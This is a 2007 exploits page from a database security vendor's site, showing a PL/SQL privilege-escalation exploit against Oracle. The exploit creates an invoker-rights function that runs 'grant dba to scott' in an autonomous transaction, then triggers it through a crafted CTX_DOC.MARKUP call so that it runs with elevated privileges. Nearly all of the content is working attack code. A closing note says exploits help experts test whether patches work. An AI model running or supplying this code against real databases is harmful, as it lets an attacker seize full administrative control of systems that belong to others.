Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Search

Alexandr "Sh2kerr" Polyakov 

CREATE OR REPLACE FUNCTION HACKIT return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'grant dba to scott';
COMMIT;
RETURN '';
END;
/


set serveroutput on

create table mark_tab (id number primary key, text varchar2(80) );

insert into mark_tab values ('1', 'All your bases are belong to US');

create index mark_tab_idx on mark_tab(text)
        indextype is ctxsys.context parameters
        ('filter ctxsys.null_filter');


SET SERVEROUTPUT ON;
DECLARE
     mklob CLOB;
     amt NUMBER := 40;
     line VARCHAR2(80);
     BEGIN
       CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob);
       DBMS_LOB.READ(mklob, amt, 1, line);
       DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line);
       DBMS_LOB.FREETEMPORARY(mklob);
       END;
     /

© 2007 by Red-Database-Security GmbH - last update 28-nov-2007

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.